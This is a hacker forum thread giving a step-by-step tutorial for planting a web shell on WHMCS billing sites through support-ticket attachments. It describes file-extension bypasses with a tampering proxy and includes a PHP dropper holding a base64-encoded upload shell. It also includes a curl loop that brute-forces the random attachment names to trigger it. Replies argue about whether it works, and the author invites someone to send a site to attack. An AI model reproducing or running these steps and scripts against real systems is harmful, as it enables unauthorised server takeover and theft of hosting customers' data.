MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: WHMCS 3rd TricK wIth MiMe TyPe And PHP Ext ByPass
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
Hello Brothers Heart

How are You ?

Today We've 3rd WHMCS Trick Smiley1 - Uploading Shell On WHMCS Via Attachments

At First , Let's Talk About Mime Types

These Are Extensions

Code:
gif,png,rar,zip,php,asp,aspx

Apache Uses Extension To Run File As It Extension

For Example If You Upload File As This : b0x.gif

Apache Will run it As Picture/Image

And If You Do it As This : b0x.php

The File will Be Run as PHP File Smiley1

Okay ... In Apache There Are Many Extensions Are Not Defined-ed Like rar

So Let's Start in WHMCS go to submit new ticket

Code:
http://site.tld/whmcs/submitticket.php

You'll See This

[Image: WOR61514.png]
So Here The Attachments We've Prospect'z

I : The Extension PHP Is allowed To Be Uploaded Smiley1

But When We Try 2 Upload PHP File We'll Have This result

[Image: AKQ64896.png]

To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This

Code:
b0x.PHP

The Changing In Extension Will Be Via Tamepr Data

[Image: oDZ62191.png]

Then Submit it

[Image: wh162273.png]

Our Ticket Is ready Now .. So We Uploaded PHP

This Was Our 1st Prospect

II : PHP Extension Is not Allowed To Be uploaded on WHMCS

So We'll Use Non-Defined Extension in Apache

Like " rar " So We'll Use Tamper Data Too

[Image: tSi62460.png]

We'll Upload As This "b0x.PHP.rar"

Don't Forget Capital Letters

Then We'll Have This

[Image: hlj62514.png]

File Uploaded Successfully Biggrinsmiley

But In WHMCS ,, When You Use Attachment or upload One

The File Will Automatically Renamed To Be Like This

Code:
number_filename.extension

For Example Our File b0x.PHP Will Be Like This

Code:
RandomNumber_b0x.PHP

We'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers

Before That .. Let's Make Small Summery

This Code Must be As Attach File

PHP Code:
<?php 
$shellcode 
"PD9waHANCmVjaG8gJzxiPjxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgR0FHQUwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="
$b0x fopen("sec4ever.php","w"); 
fwrite($b0x,base64_decode($shellcode)); 
?>

This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined

After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php

PHP Code:
<?  
error_reporting
(0);  
$url "http://domain.tld/whmcs/";  
$attachfolder "attachments";  
$attach"b0x.PHP";  
for(
$b0x=100000$b0x<1000000;$b0x++){  
$urls "$url/$attachfolder/$b0x"$urls.="_$attach";  
$ch = @curl_init();  
@
curl_setopt($chCURLOPT_RETURNTRANSFER1);  
@
curl_setopt($chCURLOPT_URL$urls );  
$result = @curl_exec($ch);  
@
curl_close($ch);  
}  
?>

Edit The Variables To Get The Correct Result - 3xPecteD

Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function

The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number !

But The Script Will Generate Shell/Uploader in Sec4ever.php

[Image: q8O63187.png]

Greet'z
I-Hmx
Sec4ever
MadLeets
Shadow008
1337
H4x0rL1f3
Dr.Zombie
KhantastiC
X-Shadow




Thanks 4 All
./b0x





Finally its out wink
hahahah UnderTaker u rock wink
awesome trick buddy Smiley1
wut an idea sir G =)))

RocKxx xD
Great Biggrinsmiley Smiley1
awesome trick, keep up the good work Smiley1
Not Working ...
u cant upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not excute...
(10-01-2012, 12:56 AM)b13-u Wrote: [ -> ]Not Working ...
u cant upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not excute...
lols, if this was not working we wouldnt have posted, not everything here u see is visible to 1,2,3,4,5,6 steps even all his easy you are just unable to do it.
This works 100 percent and we did it also.
Regard's
hey mad'z

thx 4 posting
Code:
lols, if this was not working we wouldnt have posted, not everything  here u see is visible to 1,2,3,4,5,6 steps even all his easy you are  just unable to do it.
This works 100 percent and we did it also.
Regard's

We'll Kill him =)))

Mr b13-u

Send Me in Priv8 Message Site To upload Shell Smiley1
And Check the Version ,, We Executed on the Last one Biggrinsmiley 5.1
how do u expect this
fwrite($b0x,base64_decode($shellcode));
to work while server is not handling it as php ?
anyway i sent u the target i alo tryed on many others

thankx
Pages: 1 2 3